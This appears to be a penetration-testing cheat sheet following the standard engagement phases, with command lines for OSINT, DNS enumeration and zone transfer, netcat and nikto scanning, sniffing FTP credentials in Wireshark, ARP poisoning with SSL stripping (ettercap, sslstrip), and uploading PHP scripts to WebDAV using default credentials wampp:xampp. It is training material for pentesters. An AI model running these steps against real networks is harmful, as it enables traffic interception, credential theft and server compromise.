Académique Documents
Professionnel Documents
Culture Documents
Pre-engagement
###############################################################################
2. Information Gathering
**OSINT**
InSpy
--How to Use it?
1. inspy "Company Name" --empspy /usr/share/inspy/wordlists/title-list-large.txt
Recon-ng
Search for additional subdomain
1. use recon/hosts/gather/http/web/google_site
2. set DOMAIN cryptors.org
3. run
Search for XSS
1. use recon/hosts/enum/http/web/xssed
-NETCRAFT
--How to use it?
---1. Go to www.netcraft.com
---2. Enter the target website
--What does it do?
---1. Provide publicly available info about the target such as
----1. Hosting Provider
----2. Domain Provider
----3. Web Server
----4. Uptime Logs
----5. Queries about Softwares they are Using
-WHOIS LOOKUPS
--How to use it?
---1. Open terminal and type: whois targetWebsite.com
--What does it do?
---1. Provide information about the website owner including contact info
---2. Provide our hosting and domain provider information
-DNS Reconnaissance
dnsenum cryptors.org
host -t ns cryptors.org
host -t mx cryptors.org
--NSLOOKUP
---How to use it #1?
----1. Open terminal and type: nslookup www.target.com
---What does it do?
----1. It will return the IP address of the target and website name
---How to use it #2?
----1. nslookup
----2. set type=mx
----3. target.com
---What does it do?
----1. It will return the mail servers of the target
--HOST
---How to use it?
----1. host -t ns target.com
---What does it do?
----1. Give us the name servers for the target
--ZONE TRANSFER
---How to use it?
----1. host -l domainToTransfer.com nameServer.com
---What does it do?
----1. It can transfer the DNS records for a domain
--THEHARVESTER
---How to use it?
----1. theharvester -d target.com -b google
---What does it do?
----1. It will list down all emails available in the target website and it's
subdomains
-MALTEGO
--How to use it?
---1. Search for Maltego App in Kali Linux
---2. Select Domain Target
---3. RUn Transforms based on your needs
--What does it do?
---1. Provide us DNS infos
---2. Provide us list of Emails in the company
---3. Provide us list of Phone numbers in the company
---4. Provide us list of available files in the company
---5. Gives us an illustrative and graphical view of the company
**PORT SCANNING**
--NETCAT
---How to use it?
----1. nc -vv 192.168.0.10 21
---What does it do?
----1. -vv means it will verbose the details of each process
----2. 192.168.0.10 is your target IP address
----3. 21 is the port number of your target
###############################################################################
3. Threat Modeling
###############################################################################
4. Vulnerability Analysis
-NIKTO
--How to use it?
---1. nikto -h websiteOrIpAddressOfTarget
--What does it do?
---1. It scans the website for possible vulnerabilities
-CADAVER
--How to use it?
---1. Check if the target website has webdav. By entering in the browser
http://website/webdav
---2. Webdav is allows client to perform remote web content operation such as to
create, change and move documents on a server
---3. If there is "WebDav Test Page" in the webdav page then you can use cadaver
---4. cadaver http://192.168.100.117/webdav
---5. It will now give you a user and pass prompt. The default username and pass is
wampp:xampp
--What does it do?
---1. It will give you an access to the server where you can do much pretty
everything.
WIRESHARK
--How to use it?
---1. Click Capture and choose a Driver (eth0, wlan0)
---2. Uncheck Promiscuous Mode then Start
---3. Do some FTP connection to the target
---4. Filter the connection to the wireshark by inputting "ftp" in the filter box
---5. We can also use ip.dst==192.168.100.117 to return only packets from this
destination IP
---6. We can also combine this commands by && command
ip.dst==192.168.100.117 && ftp
---7. We can see the user and pass by digging deeper using Follow TCP Stream
----1.Right click the start of transaction
----2. Click Follow
----3. Click TCP Stream
----4. It will give you details such as the user and pass
ARP
--How to use it?
---1. Just type: arp
--What does it do?
---1. It allows us to view the arp cache in your machine
IP Forwarding
--1. THIS IS NEEDED BEFORE CONDUCTING ARP CACHE POISONING
--2. echo 1 > /proc/sys/net/ipv4/ip_forward
SSL Stripping
--1. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-
port 8080
--2. sslstrip -l 8080
--3. ettercap -Ti wlan0 -M arp:remote /192.168.1.1// /192.168.1.9//
###############################################################################
5. Exploitation
CADAVER
--1. cadaver http://192.168.1.4/webdav
--2. wampp:xampp username and pass
--3. put test.txt (To upload file)
--4. put test.php (To upload scripts)
Bypassing Filterssss
##############################################
6. Post Exploitation
7. Reporting